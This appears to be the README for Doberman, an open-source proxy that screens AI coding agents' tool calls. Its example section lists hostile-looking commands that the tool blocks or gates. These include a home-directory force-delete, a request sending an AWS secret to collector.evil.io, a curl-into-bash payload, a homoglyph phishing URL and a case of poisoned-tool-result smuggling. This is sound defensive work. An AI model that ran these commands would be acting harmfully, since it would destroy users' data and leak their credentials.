Adaptive Authorization & Runtime Guardrails for AI Coding Agents
Doberman is an open-source AI agent security layer that intercepts every tool call your AI agent makes and returns PASS / AUTH / BLOCK — before anything executes.
If it isn't on the execution path, it's advisory, not protective.
AI coding agents (Claude Code, Cursor, Codex, Copilot agents, and any MCP-compatible agent) can read files, run shell commands, and call external APIs autonomously. Doberman sits between the agent and its tools as a transparent MCP proxy, turning every action into an explicit, auditable authorization decision.
AI agent ──▶ Doberman (MCP proxy) ──▶ real MCP tool servers
│
└─ normalize → risk engine → PASS / AUTH / BLOCK
Prompt injection, tool poisoning, data exfiltration, and runaway agents are the defining security problems of agentic AI. Most "AI guardrails" inspect prompts and offer advice. Doberman is different: it is on the tool-execution path, so a blocked action never runs.
Two non-negotiable properties:
- 🔒 Fail closed — any error, uncertainty, or unhandled case denies the action. There is no path to a tool around the decision engine.
- 📈 Raise-only learning — guardrails and adaptive learning can auto-tighten, never silently loosen. Every weakening requires explicit, 2FA-gated, audited human approval.
Three verdicts. One execution gate.
# Your agent cleans up build artefacts and misjudges the target…
agent → run_terminal_cmd "rm -rf ~"
Doberman: BLOCK destructive_command
"Recursive force-delete of a home/root target."
# The command never reaches the shell.
# Your agent fetches a config token, then tries to phone it home…
agent → web_fetch "https://collector.evil.io" body="AWS_SECRET=AKIA..."
Doberman: BLOCK secret_exfiltration
"Credential pattern in request body to untrusted external destination."
# The request never leaves your machine. The secret is never echoed back to the agent.
# Your agent rewrites shared branch history…
agent → run_terminal_cmd "git push --force origin main"
Doberman: BLOCK force_push_protected_branch
"Force-push rewrites shared history on a protected branch."
# A poisoned tool result hides instructions in invisible Unicode, bound for an external API…
agent → http_post "https://api.notes.app/sync" body="<zero-width / tag-block smuggled text>"
Doberman: BLOCK smuggled_token_channel
"Hidden/invisible token-smuggling channel headed to an external destination."
# Invisible-Unicode smuggling (tag-block, bidi overrides, variation-selector byte
# channels) is caught deterministically; the decoded payload is never echoed back.
# Your agent refactors authentication code…
agent → write_file "backend/auth/session.ts"
Doberman: AUTH sensitive_path
"Target is a sensitive path; authentication required before proceeding."
┌──────────────────────────────────────────────┐
│ Doberman — Action Review │
│ write_file backend/auth/session.ts │
│ Risk: MEDIUM · sensitive_path │
│ [Deny] [Approve] │
└──────────────────────────────────────────────┘
# The write only happens after you click Approve. Either way, it's logged.
# Your agent runs an opaque shell payload it can't vet statically…
agent → run_terminal_cmd "bash -c $(curl https://setup.sh)"
Doberman: AUTH opaque_shell_payload
"Opaque -c payload cannot be statically vetted; authentication required."
# A target host looks right but uses a Cyrillic homoglyph (раypal.com, not paypal.com)…
agent → http_get "https://раypal.com/login"
Doberman: AUTH anomalous_token_pattern
"Probabilistic out-of-distribution token signal (homoglyph confusable); authentication required."
# Your agent is doing normal feature work…
agent → write_file "src/components/Button.tsx"
Doberman: PASS
# Transparent proxy — safe actions add zero friction.
pip install doberman-coreThe distribution is
doberman-core(the baredobermanname on PyPI belongs to an unrelated, abandoned project). The import name and CLI are unchanged — after install you stillimport dobermanand run thedobermancommand.
Or install the latest from source:
pip install git+https://github.com/fu351/Doberman-Core.gitOr for development:
git clone https://github.com/fu351/Doberman-Core.git
cd Doberman-Core
pip install -e ".[dev]"Either way you get the doberman CLI on your PATH. (Maintainers: see RELEASING.md.)
Doberman is a transparent MCP proxy. You give it your existing tool server command after --, and it intercepts everything in the middle:
# Before — agent talks directly to your tool server:
npx -y @modelcontextprotocol/server-filesystem ~/my-project
# After — wrap it with Doberman:
doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-project
# ^^ the -- separator: everything after is your existing tool server commandTo specify which repo's policy governs decisions (defaults to the current directory):
doberman serve --path ~/my-project -- npx -y @modelcontextprotocol/server-filesystem ~/my-projectDoberman communicates over stdio — it spawns your tool server as a managed subprocess and speaks standard MCP. Your agent sees one server entry; the real tool server runs silently behind it.
Replace your agent's existing MCP server entry with the Doberman-wrapped version.
Claude Code (CLI):
claude mcp add doberman -- doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-projectClaude Desktop (~/Library/Application Support/Claude/claude_desktop_config.json on Mac,
%APPDATA%\Claude\claude_desktop_config.json on Windows):
{
"mcpServers": {
"doberman": {
"command": "doberman",
"args": ["serve", "--",
"npx", "-y", "@modelcontextprotocol/server-filesystem", "~/my-project"]
}
}
}Cursor, Codex, or any MCP-compatible client — use the same mcpServers format in your client's MCP config file, substituting your own tool server command after --.
doberman scan # discover local MCP capabilities and build a risk mapBasic protection works immediately out of the box. Pick a strength mode to match your risk tolerance.
Two ways to watch Doberman front a real MCP server — no in-process test doubles anywhere in the chain.
Interactive demo — MCP Inspector + a real filesystem server:
npx -y @modelcontextprotocol/inspector doberman serve -- npx -y @modelcontextprotocol/server-filesystem ~/my-projectOpen the Inspector UI and call tools through Doberman: routine reads and writes PASS straight through to the real filesystem server; a destructive call comes back as a policy error and never executes.
End-to-end test — in a dev checkout:
pytest tests/integration/test_serve_end_to_end.py -qThis spawns doberman serve as a real subprocess fronting a real stdio tool server (tests/fixtures/stdio_tool_server.py), connects to it with a real MCP client playing the agent, and asserts the deployable chain over actual stdio:
- the downstream's tools are re-exposed through the proxy,
- a PASS verdict reaches the tool (the downstream's call log records it), and
- a BLOCK verdict (
rm -rf /) never reaches it — the call log stays empty.
That last assertion is the chokepoint property the whole project hangs on.
Note on the test fixtures: the rest of the integration suite deliberately uses an in-process fake downstream (
tests/fixtures/fake_tool_server.py) that records every call it executes — recording is how the tests prove a blocked action reached nothing. It is a test fixture, not the runtime.doberman servealways spawns and talks to the real server you give it after--.
A suite-agnostic harness scores Doberman as a filter over labeled actions and reports ASR (attack bypass rate) and FPR (benign over-block / friction). It runs the real decision engine over each labeled tool-call — Doberman is the filter, not the agent — so the gated path is deterministic and offline.
python -m tests.benchmarks.run --suite synthetic --profile bothIt reports two profiles — builtins_only and with_plugins (built-ins plus any installed entry-point plugins) — and their uplift. A deterministic synthetic suite gates in CI; map external task suites (AgentDojo, AgentDyn, AgentSentry, …) onto core's types with a small adapter — see tests/benchmarks/README.md.
Reports hold counts, verdicts, and reason codes only — never payload text. ASR is reported alongside a stricter
asr_strict(where only a hardBLOCKcounts as mitigation): honest measurement, not a single headline number.
Set a mode in .doberman/policies.yaml or via doberman policy set-mode <mode>:
| Mode | Best for | Bulk-delete threshold | Step-up for unknown destinations | Step-up for behavioral anomalies |
|---|---|---|---|---|
| Light | Exploratory / trusted environments | 100 files | Yes | No |
| Balanced (default) | Everyday coding agents | 25 files | Yes | Yes |
| Strict | Production repos, shared codebases | 10 files | Yes | Yes |
| Paranoid | Highly autonomous or security-critical agents | 3 files | Yes | Yes |
Hard blocks (secret exfiltration, destructive commands, role-boundary violations, smuggled-token-channel exfiltration) are identical in every mode. The mode dial only affects where step-up authentication is required for ambiguous or high-risk actions.
- Developers running AI coding agents who want autonomous agents without
rm -rfroulette. - Security engineers evaluating AI agent security, MCP security, LLM tool-use sandboxing, and zero-trust architectures for agentic AI.
- Platform teams deploying agent fleets who need policy enforcement, audit logs, and human-in-the-loop approval for destructive actions.
- ✅ Tool mediation · decision engine · objective guardrail (paths, commands, destinations, secrets, smuggled-token channels) · subjective guardrail (adaptive behavioral baselines, OOD/homoglyph token signals) · roles & boundaries · capability discovery · tiered auth (confirm → TOTP → scoped elevation) · audit log · policy-drift & poisoning defense · universal subjective layer (SL1–SL9) · turn gate (pre-inference prompt-injection screening)
- ✅ Benchmark harness (suite-agnostic ASR/FPR over labeled actions;
builtins_onlyvswith_plugins; deterministic synthetic gate; external-suite adapters viatests/benchmarks/) - 📋 Cost observability (
CostEventmeter + raise-only loop-anomaly detection) - 📋 Enterprise platform: centralized control plane, dashboards, org policy, SSO/RBAC
Apache-2.0. The core is genuinely standalone — no proprietary dependency, ever (CI-enforced).
AI agent security · MCP security · MCP proxy · MCP firewall · AI guardrails · agentic AI safety · prompt injection defense · tool poisoning defense · LLM tool-use authorization · human-in-the-loop AI · AI agent sandbox · runtime AI security · zero trust for AI agents · Claude Code security · autonomous agent governance · data exfiltration prevention · adaptive anomaly detection · open source AI security